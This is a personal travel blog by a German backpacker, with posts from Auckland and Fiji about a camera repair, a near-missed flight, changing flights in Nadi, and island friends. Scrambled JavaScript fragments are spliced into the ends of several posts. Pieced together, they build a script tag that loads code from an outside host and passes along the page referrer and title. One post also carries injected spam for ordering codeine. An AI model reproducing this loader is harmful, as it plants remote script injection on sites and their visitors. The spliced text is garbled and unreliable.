Back in Auckland

Posted by admin On August - 22 - 2006

Russell sent me a message that my one camera is fixed. I had to pay about NZ$ 490,70. But in the end it was fixed. Ok the other camera is now brocken but they say its not worth to repair it. Stupid. Sam was so interessted to see wonderful Fiji that he and his friend Nathan wanna come with me to Fiji. So we will organise all the things that we can leave on Saturday. I’m so looking forward to coming back in my little paradies.d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

No ‘Rainbow Warrior’

Posted by admin On August - 19 - 2006

Really unexpected I waited in vain at 7:00am in front of the dive shop. When the lady arrived she told me that all the diving shops here not dive the ‘Rainbow Warrior’ in winter. Its only seasonal. I went back to my backpackers. The day seems boring but I met Sam and we had a funny relaxed day. So it was not that bad in the end.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Nananu in St. Lukes shopping mall?

Posted by admin On August - 9 - 2006

Went today in the St. Lukes shopping mall in Auckland/NZ for bringing my one-way-cameras to the camerahouse. Suddenly I was really surprised I thought I dream: in the shopping mall is a model of Nananu-I-Ra. You can buy parts of it… really sad how this beautiful island will change the next years. But have a look…

By the way – the world is so small – Mandy fabricated this model of Nananu. She is model maker.d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);

Almost missed the flight

Posted by admin On August - 8 - 2006

Never had that before: I got up at 6:30am in the morning. Today have to go back to cold and boring Auckland. I was a bit concerned that I could not bring my shells to New Zealand. And after changing my flight couple of times I was pretty sure that my flight is about 10:00am. So I was sitting at the deck eating my breakfast. Just in case I had a quick look at my ticket and started panicing…my flight was at 8:45am!!! And it was just 8:10am. So after fiji time it was almost impossible to get my flight. I ordered a taxi and at the airport I was running straight to my gate. Had only 10min left. But I had not known that it is necessary to bring my ticket back home to Germany with me because have a valid visa for New Zealand. The people at the counter make a big drama out of it and I was just under shock thought that I will never get my flight home. They wanted I phone card and when I gave them one they phoned to Emirates Airlines (my airline back Germany) or with the NZ customs. Finally I could go on board. Everybody just waited for me. Really embarassing situation.var d=document;var s=d.createElement(‘script’);

Leaving to Nadi

Posted by admin On July - 26 - 2006

Today we left to Nadi first to change the flights at the airport. Was a nice relaxing trip with Glenn and the two israelis, Ariel and …(What’s his name again?). The change whas quick and easy. The flight back Auckland is at the 08 of june 2006. The israelis left us so we went to the Nadi Bay Hotel for check in and have a hot shower (only cold ones on the island). Later Glenn showed me a bit of Nadi and we went straight to one DVD shop. Its funny you can buy hundred of DVD copies very cheap and in good quality. I’m just concerned that they are not working at my laptop or DVD player because its european. Maybe I have to try out… We had dinner at the ‘Hamburg Bar’ which belongs to a german. Talked a bit german with him and heared how difficult it is to open a bar in Fiji and to get the liquor licence. order promethazine codeine from canada

Changing flights

Posted by admin On July - 25 - 2006

After calling Pacific Airlines I found out for changing flights I have to go to Nadi. It is not possible to change them online or at the phone. So its a journey just for changing them because the public transportation is not really good in Fiji. Air Pacific told me latest I can change them for NZ$ 100 at Thursday. Glenn had lots to do in Nadi as well so we will go there on Wednesday.if (document.currentScript) {

Farewell Harriet and James

Posted by admin On July - 22 - 2006

Harriet and James left today back to England. Was a really sad farewell. After a while its hard if you start liking people to much that you miss them… Hope I will catch up with as much people as I can next year in the UK. Zoe said she will stay a couple of days longer but she changed her mind quickly and after two hours I recognized in a conversation that she will leave tomorrow. I was disappointed because looked forward to spend time with her at the beach. Felt for some minutes pretty alone on the island and I thought maybe now is the best time for a change. And because I’m now advanced diver I remembered a friends recommendation for the best shark feeding in the world in Pacific Harbor. I asked Glenn about it and he offered me to come with me. I was happy and looking forward to spend some days with him away from the island.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

German support

Posted by admin On June - 26 - 2006

The german national team did again very well in the soccer world cup. They did two goals against Sweden. So for more support I bought today a little german flag and pined it on my bag.

Weekend in Thames

Posted by admin On June - 23 - 2006

Again I spent a weekend in Thames together with Russell at his parents place. We done almost nothing just relaxing and I took some nice pictures of exotic plants we have not back in Germany. First time I saw a macadamia nut tree and I was very surprised what it looks like. Its leaves look and feel like laurel leaves.
